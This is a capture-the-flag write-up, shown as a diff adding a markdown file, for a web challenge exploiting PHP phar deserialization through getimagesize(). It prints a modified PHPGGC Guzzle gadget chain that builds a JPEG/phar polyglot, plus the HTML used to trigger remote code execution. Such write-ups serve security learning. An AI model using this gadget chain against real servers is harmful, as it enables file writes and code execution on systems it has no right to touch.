|
| 1 | +# Web 05 |
| 2 | +The challenge has source code (luckily). |
| 3 | + |
| 4 | +We can trigger deserialization because of following vulnerable code: |
| 5 | +``` |
| 6 | + try { |
| 7 | + if ($imageInfo['Height'] && $imageInfo['Width']) { |
| 8 | + $height = $imageInfo['Height']; |
| 9 | + $width = $imageInfo['Width']; |
| 10 | + } else { |
| 11 | + list($width, $height) = getimagesize($image); |
| 12 | + } |
| 13 | + |
| 14 | +``` |
| 15 | +`getimagesize()` accepts attacker controllable URI. If we pass `phar://` scheme it would trigger phar deserialization. |
| 16 | + |
| 17 | +One more thing we need to care of is our phar archive must be a valid image (or at least look like it). There's a known solution for this problem. |
| 18 | + |
| 19 | +The server uses `http guzzle` that again, fortunately for us, has needed gadget achieve RCE on the server. |
| 20 | +The `php-ggc` framework contains a generator code that is changed so that it would generate phar/image polyglot. |
| 21 | + |
| 22 | +The modified code is shown below: |
| 23 | +``` |
| 24 | +<?php |
| 25 | +
|
| 26 | +namespace GadgetChain\Guzzle; |
| 27 | +
|
| 28 | +class FW1 extends \PHPGGC\GadgetChain\FileWrite |
| 29 | +{ |
| 30 | + public static $version = '6.0.0 <= 6.3.3+'; |
| 31 | + public static $vector = '__destruct'; |
| 32 | + public static $author = 'cf'; |
| 33 | +
|
| 34 | + public function generate(array $parameters) |
| 35 | + { |
| 36 | + $path = $parameters['remote_path']; |
| 37 | + $data = $parameters['data']; |
| 38 | + $a = new \GuzzleHttp\Cookie\FileCookieJar($path, $data); |
| 39 | + //unlink('pwn.phar'); |
| 40 | + $p = new \Phar('pwn.phar', 0); |
| 41 | + $p['file.txt'] = 'test'; |
| 42 | + $p->setMetadata($a); |
| 43 | + $p->setStub("\xff\xd8\xff\xe0\x0a<?php __HALT_COMPILER(); ?>"); |
| 44 | + } |
| 45 | +} |
| 46 | +
|
| 47 | +``` |
| 48 | + |
| 49 | +We upload this "image" to server and record the path. |
| 50 | +Then we generate html page that would point to it. |
| 51 | +``` |
| 52 | +<html> |
| 53 | +<head></head> |
| 54 | +pwn image here |
| 55 | +<img src=phar:///app/upload/af55k6peln8ni9270eut7i8uqr/73f2a4aa40cf38e647d802bc.jpg> |
| 56 | +<body></body> |
| 57 | +</html> |
| 58 | +``` |
| 59 | +Then we fetch image from our server and get RCE. |
| 60 | + |
| 61 | +## Flag |
| 62 | +`WhiteHat{ph4r_d3_w1th_4_t1ny_b4ck_do0r_7fc88491}` |
0 commit comments